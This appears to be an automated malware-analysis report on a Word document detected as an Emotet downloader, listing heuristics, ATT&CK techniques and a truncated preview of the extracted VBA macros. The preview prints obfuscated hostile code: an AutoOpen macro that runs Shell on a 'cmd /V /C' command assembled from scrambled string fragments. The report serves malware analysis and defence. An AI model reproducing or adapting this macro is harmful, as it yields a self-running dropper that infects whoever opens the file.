MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. The AutoOpen macro is present and likely used to trigger this malicious behavior. ClamAV also identifies the file as Doc.Downloader.Emotet-6884162-0, strongly suggesting it's part of the Emotet family and designed to download further malicious content.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6884162-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6884162-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17129 bytes |
SHA-256: 8ff5a72ac7bb97232cd63edd0c8eb1494a390dfcc700dbf561db59fc50d7e60d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "UAAprPKDkj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName CDate(FDCtG)
TypeName ChrB(OumrLJ - KmduV)
TypeName 4
TypeName Atn(FwBzEv)
VBA.Shell# KeyString(DzZjkPIj + CciFzUXZM + vbKeyC + bLOSwrzBEFijw + TZURFOE) + jfFnIXww + cnKNlXLidI + FWFsKb + RoavPKhzp + DfWDPjw + CttYJQHpJkm + kBGhYkZJYAA + AQwuqitCS + DbzjmSSuR + trvYw + ICZHvtzKint + TsrnZ + CGUwjYvzuc + cssis + hFmTlKshIm + XPJMitujbVp, 568900977 - 568900977
TypeName Cos(211188863)
TypeName 1
End Sub
Attribute VB_Name = "HZsANvFGFaSmB"
Function FWFsKb()
On Error Resume Next
TypeName ChrB(docLC / bpmKW)
TypeName Cos(HRUUF / jnbIQ + rYLAu + JVzaI)
TypeName Cos(JkIsw)
JnjdZ = "md " + " " + "/V" + " " + " /" + CStr(Chr(RZUiUDkwvPUCi + VpXJfsUODZ + 67 + cYHHCzXGECw + wIOMjwfIFiZ)) + " " + " " + CStr(Chr(rzzKRIHWIYoI + HqQStni + 34 + FBTcjXWphzTI + tlnbIqja)) + "se"
TypeName Log(OhICT / jHcZkp + 28400 - OoScD)
TypeName hNFHih
MAwzroEjfm = "t " + " " + " " + " t" + "Yf" + "1" + "=Nq" + CStr(Chr(uYSpPjUEJ + JzjbwljHJzthj + 99 + GMVrAfzCiHFh + iOwNRkn)) + "pu" + "vu" + CStr(Chr(JEASuSA + RiaHiSLMLvzT + 99 + JGikvTP + wMMmAMCjiQUPra))
TypeName Cos(QdAwbX + XqSfX)
TypeName 7
TypeName fwjEB
UUwbS = "rN" + "wDR" + "z" + "Spi" + "W" + "w" + "Bw"
TypeName Hex(lbzQoC)
TypeName Oct(97)
TypeName Cos(zIFsYS * 62608 - 10437 - YBtWii)
DRIBTh = "i" + "vZ" + CStr(Chr(jBFYrJjQAqM + EXWiobvWfLzI + 99 + CYoSfHDPS + CpfvmJAmB)) + "W" + CStr(Chr(zlDzbKAqFQfti + YhJipEMQ + 99 + PbsBzWKmJbDO + tOcEzWvBDal)) + "k" + "vww"
TypeName Int(PUbGOV + iiOXV)
TypeName Sgn(dXUKqC)
VXQdHWQH = "wu" + "a" + "i" + CStr(Chr(WnolVRNMiHo + VHUQIJAikacHSP + 67 + XSQftnwVp + SSKGnzCAojmRbS)) + "WP" + "fh" + "2" + "n" + CStr(Chr(MLdCBXwLpYaB + zabLiMaT + 108 + PPBhkAoN + lJMfwvU)) + "m" + "gF\" + "'j"
FWFsKb = JnjdZ + MAwzroEjfm + UUwbS + DRIBTh + VXQdHWQH
TypeName CBool(RrXNcC)
TypeName 71
TypeName 83
End Function
Function RoavPKhzp()
On Error Resume Next
TypeName 75
TypeName 397972860
YwdJj = "${x" + "()=" + "/H" + "A" + "+,4" + "." + "V" + "8}e" + "G" + ":to" + CStr(Chr(OWBSjjLqP + LsVTnmWQapkN + 76 + WqOvPmraCbn + UBYJYdJqsosrKZ))
TypeName dKfhoA
TypeName Oct(mRCju + 6011)
HiwHRsji = "yd-" + "@ s" + ";b&" + "& f" + "or " + " %X" + " " + "in" + " " + "( " + "15"
TypeName Int(zXVszf)
TypeName Hex(44)
TypeName CSng(964)
UnlriHBzU = " 69" + " " + " 31" + " " + " " + " " + " "
TypeName QNzGT
TypeName 7880
TypeName Tan(UmMcnV)
AXPzT = "65 " + "8" + " 76" + " " + " 3" + "9 6" + "5" + " "
TypeName CLng(ittSXn)
TypeName jnBZzj
TypeName Rnd(426249057)
cLHJJbowSz = " 4" + "2 " + " 42" + " 7" + "5 " + " 49" + " 8" + " " + "7" + "6 " + " " + " " + "13 "
TypeName CDate(wiaVE + 43003)
TypeName Log(997)
TypeName 7
DjSnFuB = "54 " + " " + "41" + " 6" + "5 " + " " + "3" + "1 "
TypeName XZBiz
TypeName Sin(jAFSn * OMBOj)
TypeName Cos(11965965)
BPZwkBtP = " " + " 7" + "3" + " " + " 69" + " " + " " + "7" + "8 " + " "
TypeName CDbl(410)
TypeName Int(akJFS)
TypeName CDbl(372)
DJfbhG = "4" + "8 " + "6" + "5" + " " + "26" + " " + "68 " + " " + " "
RoavPKhzp = YwdJj + HiwHRsji + UnlriHBzU + AXPzT + cLHJJbowSz + DjSnFuB + BPZwkBtP + DJfbhG
TypeName zFwto
TypeName CByte(69115 / cdjAj)
End Function
Function DfWDPjw()
On Error Resume Next
TypeName Oct(vDswV * hhuiid)
TypeName PzIQtR
EwGmjF = "75 " + " " + "9 " + " 6" + "5 6" + "8" + " " + " " + "61" + " " + "36" + " " + " "
TypeName 500749238
TypeName Sqr(NZsJTE)
TypeName zCWtLJ
EwYioMMA = " " + " " + "65 " + " " + "78" + " 35" + " " + "4" + "2 " + " " + " 34" + " 6" + "5 "
TypeName Hex(32)
TypeName 179
XoidKE = "41" + " 6" + "8 " + " 7" + "7 " + "49 " + "23 " + "12 "
TypeName SGQjO
TypeName C
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.